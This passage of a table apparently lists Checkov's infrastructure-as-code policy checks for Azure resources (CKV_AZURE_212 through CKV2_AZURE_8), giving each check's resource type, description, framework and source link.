Microsoft.Web/sites | Ensure App Service has a minimum number of instances for failover | arm | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py) | +| 2154 | CKV_AZURE_212 | resource | Microsoft.Web/sites | Ensure App Service has a minimum number of instances for failover | Bicep | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py) | +| 2155 | CKV_AZURE_212 | resource | Microsoft.Web/sites/slots | Ensure App Service has a minimum number of instances for failover | arm | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py) | +| 2156 | CKV_AZURE_212 | resource | Microsoft.Web/sites/slots | Ensure App Service has a minimum number of instances for failover | Bicep | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceInstanceMinimum.py) | +| 2157 | CKV_AZURE_212 | resource | azurerm_service_plan | Ensure App Service has a minimum number of instances for failover | Terraform | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py) | +| 2158 | CKV_AZURE_213 | resource | Microsoft.Web/sites | Ensure that App Service configures health check | arm | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py) | +| 2159 | CKV_AZURE_213 | resource | Microsoft.Web/sites | Ensure that App Service configures health check | Bicep | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py) | +| 2160 | CKV_AZURE_213 | resource | Microsoft.Web/sites/slots | Ensure that App Service configures health check | arm | 
[AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py) | +| 2161 | CKV_AZURE_213 | resource | Microsoft.Web/sites/slots | Ensure that App Service configures health check | Bicep | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSetHealthCheck.py) | +| 2162 | CKV_AZURE_213 | resource | azurerm_app_service | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 2163 | CKV_AZURE_213 | resource | azurerm_linux_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 2164 | CKV_AZURE_213 | resource | azurerm_windows_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 2165 | CKV_AZURE_214 | resource | azurerm_linux_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | +| 2166 | CKV_AZURE_214 | resource | azurerm_windows_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | +| 2167 | CKV_AZURE_215 | resource | azurerm_api_management_backend | Ensure API management backend uses https | Terraform | 
[APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py) | +| 2168 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | arm | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | +| 2169 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Bicep | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | +| 2170 | CKV_AZURE_216 | resource | azurerm_firewall | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Terraform | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py) | +| 2171 | CKV_AZURE_217 | resource | azurerm_application_gateway | Ensure Azure Application gateways listener that allow connection requests over HTTP | Terraform | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py) | +| 2172 | CKV_AZURE_218 | resource | Microsoft.Network/applicationGateways | Ensure Application Gateway defines secure protocols for in transit communication | arm | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py) | +| 2173 | CKV_AZURE_218 | resource | Microsoft.Network/applicationGateways | Ensure Application Gateway defines secure protocols for in transit communication | Bicep | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py) | +| 2174 | CKV_AZURE_218 | resource | 
azurerm_application_gateway | Ensure Application Gateway defines secure protocols for in transit communication | Terraform | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py) | +| 2175 | CKV_AZURE_219 | resource | azurerm_firewall | Ensure Firewall defines a firewall policy | Terraform | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py) | +| 2176 | CKV_AZURE_220 | resource | azurerm_firewall_policy | Ensure Firewall policy has IDPS mode as deny | Terraform | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py) | +| 2177 | CKV_AZURE_221 | resource | azurerm_linux_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 2178 | CKV_AZURE_221 | resource | azurerm_linux_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 2179 | CKV_AZURE_221 | resource | azurerm_windows_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 2180 | CKV_AZURE_221 | resource | azurerm_windows_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | 
[FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 2181 | CKV_AZURE_222 | resource | Microsoft.Web/sites | Ensure that Azure Web App public network access is disabled | arm | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py) | +| 2182 | CKV_AZURE_222 | resource | Microsoft.Web/sites | Ensure that Azure Web App public network access is disabled | Bicep | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py) | +| 2183 | CKV_AZURE_222 | resource | Microsoft.Web/sites/config | Ensure that Azure Web App public network access is disabled | arm | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py) | +| 2184 | CKV_AZURE_222 | resource | Microsoft.Web/sites/config | Ensure that Azure Web App public network access is disabled | Bicep | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py) | +| 2185 | CKV_AZURE_222 | resource | Microsoft.Web/sites/slots | Ensure that Azure Web App public network access is disabled | arm | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py) | +| 2186 | CKV_AZURE_222 | resource | Microsoft.Web/sites/slots | Ensure that Azure Web App public network access is disabled | Bicep | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py) | +| 2187 | CKV_AZURE_222 | resource | azurerm_linux_web_app | Ensure that Azure Web App public network access is disabled | Terraform | 
[AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | +| 2188 | CKV_AZURE_222 | resource | azurerm_windows_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | +| 2189 | CKV_AZURE_223 | resource | Microsoft.EventHub/namespaces | Ensure Event Hub Namespace uses at least TLS 1.2 | arm | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventHubNamespaceMinTLS12.py) | +| 2190 | CKV_AZURE_223 | resource | Microsoft.EventHub/namespaces | Ensure Event Hub Namespace uses at least TLS 1.2 | Bicep | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/EventHubNamespaceMinTLS12.py) | +| 2191 | CKV_AZURE_223 | resource | azurerm_eventhub_namespace | Ensure Event Hub Namespace uses at least TLS 1.2 | Terraform | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py) | +| 2192 | CKV_AZURE_224 | resource | azurerm_mssql_database | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity | Terraform | [SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py) | +| 2193 | CKV_AZURE_225 | resource | Microsoft.Web/serverfarms | Ensure the App Service Plan is zone redundant | arm | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePlanZoneRedundant.py) | +| 2194 | CKV_AZURE_225 | resource | Microsoft.Web/serverfarms | Ensure the App Service Plan is zone 
redundant | Bicep | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePlanZoneRedundant.py) | +| 2195 | CKV_AZURE_225 | resource | azurerm_service_plan | Ensure the App Service Plan is zone redundant | Terraform | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py) | +| 2196 | CKV_AZURE_226 | resource | Microsoft.ContainerService/managedClusters | Ensure ephemeral disks are used for OS disks | arm | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEphemeralOSDisks.py) | +| 2197 | CKV_AZURE_226 | resource | Microsoft.ContainerService/managedClusters | Ensure ephemeral disks are used for OS disks | Bicep | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEphemeralOSDisks.py) | +| 2198 | CKV_AZURE_226 | resource | azurerm_kubernetes_cluster | Ensure ephemeral disks are used for OS disks | Terraform | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py) | +| 2199 | CKV_AZURE_227 | resource | Microsoft.ContainerService/managedClusters | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | arm | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py) | +| 2200 | CKV_AZURE_227 | resource | Microsoft.ContainerService/managedClusters | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Bicep | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py) | +| 2201 | CKV_AZURE_227 | resource | 
Microsoft.ContainerService/managedClusters/agentPools | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | arm | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py) | +| 2202 | CKV_AZURE_227 | resource | Microsoft.ContainerService/managedClusters/agentPools | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Bicep | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSEncryptionAtHostEnabled.py) | +| 2203 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | +| 2204 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster_node_pool | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | +| 2205 | CKV_AZURE_228 | resource | azurerm_eventhub_namespace | Ensure the Azure Event Hub Namespace is zone redundant | Terraform | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py) | +| 2206 | CKV_AZURE_229 | resource | Microsoft.Sql/servers/databases | Ensure the Azure SQL Database Namespace is zone redundant | arm | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLDatabaseZoneRedundant.py) | +| 2207 | CKV_AZURE_229 | resource | 
Microsoft.Sql/servers/databases | Ensure the Azure SQL Database Namespace is zone redundant | Bicep | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLDatabaseZoneRedundant.py) | +| 2208 | CKV_AZURE_229 | resource | azurerm_mssql_database | Ensure the Azure SQL Database Namespace is zone redundant | Terraform | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py) | +| 2209 | CKV_AZURE_230 | resource | azurerm_redis_cache | Standard Replication should be enabled | Terraform | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py) | +| 2210 | CKV_AZURE_231 | resource | azurerm_app_service_environment_v3 | Ensure App Service Environment is zone redundant | Terraform | [AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py) | +| 2211 | CKV_AZURE_232 | resource | azurerm_kubernetes_cluster | Ensure that only critical system pods run on system nodes | Terraform | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py) | +| 2212 | CKV_AZURE_233 | resource | Microsoft.ContainerRegistry/registries | Ensure Azure Container Registry (ACR) is zone redundant | arm | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py) | +| 2213 | CKV_AZURE_233 | resource | Microsoft.ContainerRegistry/registries | Ensure Azure Container Registry (ACR) is zone redundant | Bicep | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py) | +| 2214 | 
CKV_AZURE_233 | resource | Microsoft.ContainerRegistry/registries/replications | Ensure Azure Container Registry (ACR) is zone redundant | arm | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py) | +| 2215 | CKV_AZURE_233 | resource | Microsoft.ContainerRegistry/registries/replications | Ensure Azure Container Registry (ACR) is zone redundant | Bicep | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableZoneRedundancy.py) | +| 2216 | CKV_AZURE_233 | resource | azurerm_container_registry | Ensure Azure Container Registry (ACR) is zone redundant | Terraform | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py) | +| 2217 | CKV_AZURE_234 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender for cloud is set to On for Resource Manager | Terraform | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py) | +| 2218 | CKV_AZURE_235 | resource | azurerm_container_group | Ensure that Azure container environment variables are configured with secure values only | Terraform | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py) | +| 2219 | CKV_AZURE_236 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable local authentication | arm | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py) | +| 2220 | CKV_AZURE_236 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable local 
authentication | Bicep | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py) | +| 2221 | CKV_AZURE_236 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts disable local authentication | Terraform | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py) | +| 2222 | CKV_AZURE_237 | resource | azurerm_container_registry | Ensure dedicated data endpoints are enabled. | Terraform | [ACRDedicatedDataEndpointEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py) | +| 2223 | CKV_AZURE_238 | resource | Microsoft.CognitiveServices/accounts | Ensure that all Azure Cognitive Services accounts are configured with a managed identity | arm | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py) | +| 2224 | CKV_AZURE_238 | resource | Microsoft.CognitiveServices/accounts | Ensure that all Azure Cognitive Services accounts are configured with a managed identity | Bicep | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py) | +| 2225 | CKV_AZURE_238 | resource | azurerm_cognitive_account | Ensure that all Azure Cognitive Services accounts are configured with a managed identity | Terraform | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py) | +| 2226 | CKV_AZURE_239 | resource | Microsoft.Synapse/workspaces | Ensure Azure Synapse Workspace administrator login password is not exposed | arm | 
[SynapseWorkspaceAdministratorLoginPasswordHidden.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceAdministratorLoginPasswordHidden.py) | +| 2227 | CKV_AZURE_239 | resource | Microsoft.Synapse/workspaces | Ensure Azure Synapse Workspace administrator login password is not exposed | Bicep | [SynapseWorkspaceAdministratorLoginPasswordHidden.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceAdministratorLoginPasswordHidden.py) | +| 2228 | CKV_AZURE_239 | resource | azurerm_synapse_workspace | Ensure Azure Synapse Workspace administrator login password is not exposed | Terraform | [SynapseWorkspaceAdministratorLoginPasswordHidden.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceAdministratorLoginPasswordHidden.py) | +| 2229 | CKV_AZURE_240 | resource | Microsoft.Synapse/workspaces | Ensure Azure Synapse Workspace is encrypted with a CMK | arm | [SynapseWorkspaceCMKEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceCMKEncryption.py) | +| 2230 | CKV_AZURE_240 | resource | Microsoft.Synapse/workspaces | Ensure Azure Synapse Workspace is encrypted with a CMK | Bicep | [SynapseWorkspaceCMKEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceCMKEncryption.py) | +| 2231 | CKV_AZURE_240 | resource | azurerm_synapse_workspace | Ensure Azure Synapse Workspace is encrypted with a CMK | Terraform | [SynapseWorkspaceCMKEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceCMKEncryption.py) | +| 2232 | CKV_AZURE_241 | resource | azurerm_synapse_sql_pool | Ensure Synapse SQL pools are encrypted | Terraform | 
[SynapseSQLPoolDataEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseSQLPoolDataEncryption.py) | +| 2233 | CKV_AZURE_242 | resource | Microsoft.Synapse/workspaces/bigDataPools | Ensure isolated compute is enabled for Synapse Spark pools | arm | [AzureSparkPoolIsolatedComputeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSparkPoolIsolatedComputeEnabled.py) | +| 2234 | CKV_AZURE_242 | resource | Microsoft.Synapse/workspaces/bigDataPools | Ensure isolated compute is enabled for Synapse Spark pools | Bicep | [AzureSparkPoolIsolatedComputeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSparkPoolIsolatedComputeEnabled.py) | +| 2235 | CKV_AZURE_242 | resource | azurerm_synapse_spark_pool | Ensure isolated compute is enabled for Synapse Spark pools | Terraform | [AzureSparkPoolIsolatedComputeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSparkPoolIsolatedComputeEnabled.py) | +| 2236 | CKV_AZURE_243 | resource | Microsoft.MachineLearningServices/workspaces | Ensure Azure Machine learning workspace is configured with private endpoint | arm | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py) | +| 2237 | CKV_AZURE_243 | resource | Microsoft.MachineLearningServices/workspaces | Ensure Azure Machine learning workspace is configured with private endpoint | Bicep | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py) | +| 2238 | CKV2_AZURE_1 | resource | azurerm_storage_account | Ensure storage for critical data are encrypted with Customer Managed Key | Terraform | 
[StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml) | +| 2239 | CKV2_AZURE_2 | resource | azurerm_mssql_server_security_alert_policy | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | +| 2240 | CKV2_AZURE_2 | resource | azurerm_sql_server | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | +| 2241 | CKV2_AZURE_3 | resource | azurerm_mssql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 2242 | CKV2_AZURE_3 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 2243 | CKV2_AZURE_3 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 2244 | CKV2_AZURE_3 | resource | azurerm_sql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | 
[VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 2245 | CKV2_AZURE_4 | resource | azurerm_mssql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 2246 | CKV2_AZURE_4 | resource | azurerm_mssql_server_security_alert_policy | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 2247 | CKV2_AZURE_4 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 2248 | CKV2_AZURE_4 | resource | azurerm_sql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 2249 | CKV2_AZURE_5 | resource | azurerm_mssql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 2250 | CKV2_AZURE_5 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | 
[VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 2251 | CKV2_AZURE_5 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 2252 | CKV2_AZURE_5 | resource | azurerm_sql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 2253 | CKV2_AZURE_6 | resource | azurerm_sql_firewall_rule | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | +| 2254 | CKV2_AZURE_6 | resource | azurerm_sql_server | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | +| 2255 | CKV2_AZURE_7 | resource | azurerm_sql_server | Ensure that Azure Active Directory Admin is configured | Terraform | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml) | +| 2256 | CKV2_AZURE_8 | resource | 
